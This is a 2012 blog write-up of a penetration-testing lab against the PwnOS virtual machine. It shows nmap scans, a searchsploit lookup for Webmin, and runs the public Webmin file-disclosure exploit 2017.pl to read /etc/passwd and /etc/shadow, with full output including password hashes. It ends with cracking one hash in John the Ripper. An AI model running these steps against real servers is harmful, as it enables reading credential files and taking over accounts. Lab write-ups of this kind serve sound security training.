Monday, October 8, 2012

Pivilage Escalation of PwNos

> Information Gathering of target ( PwNos : 192.168.254.129 )
1.  used the zenmap
   #nmap -p l-65535 -T4 -A -v 192.168.254.129


PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)

MAC Address: 00:0C:29:B1:C4:4F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 497.102 days (since Mon May 30 17:00:49 2011)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

smb-os-discovery:
|   OS: Unix (Samba 3.0.26a)
|   Computer name: ubuntuvm
|   Domain name: nsdlab
|   FQDN: ubuntuvm.NSDLAB
|   NetBIOS computer name:
|_  System time: 2012-10-08 19:26:31 UTC-5

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 192.168.254.129


2. Used nmap
search version info
#nmap -sV 192.168.254.129

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
MAC Address: 00:0C:29:B1:C4:4F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel



> Service Enumeration

Service        version
ssh        OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
netbios-ssn    Samba smbd 3.X (workgroup: MSHOME)
netbios-ssn    Samba smbd 3.X (workgroup: MSHOME)
http        MiniServ 0.01 (Webmin httpd)

> Vunerable Asassment
#cd pentest/exploits/exploitdb#
#./searchspoloit webmin

Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
root@latif:/pentest/exploits/exploitdb# cd platforms/multiple/remote/
root@latif:/pentest/exploits/exploitdb/platforms/multiple/remote# ./2017.pl
bash: ./2017.pl: /usr/bin/perl^M: bad interpreter: No such file or directory
root@latif:/pentest/exploits/exploitdb/platforms/multiple/remote# ./2017.pl
bash: ./2017.pl: /usr/bin/perl^M: bad interpreter: No such file or directory
root@latif:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
 0  - > HTTP
 1  - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd

We meet the VA of target !!!
webmin < 1.290

> Exploit
 #cd platforms/multiple/remote
1. Exploit password
#perl 2017.pl 192.168.254.129 10000 /etc/passwd 0
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash

2. Exploit shadow
#perl 2017.pl 192.168.254.129 10000 /etc/shadow 0
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::


> Privilege Escalation
 When you get the file of password and shadow,you must crack the password and this method is privilage escalation. For decrypted the password, I used the john the ripper.

make a file on john folder
here i want carck password of osama
#nano tes.txt
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::

after saved,type
#./john tes.txt


wait till password cracked :)




Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)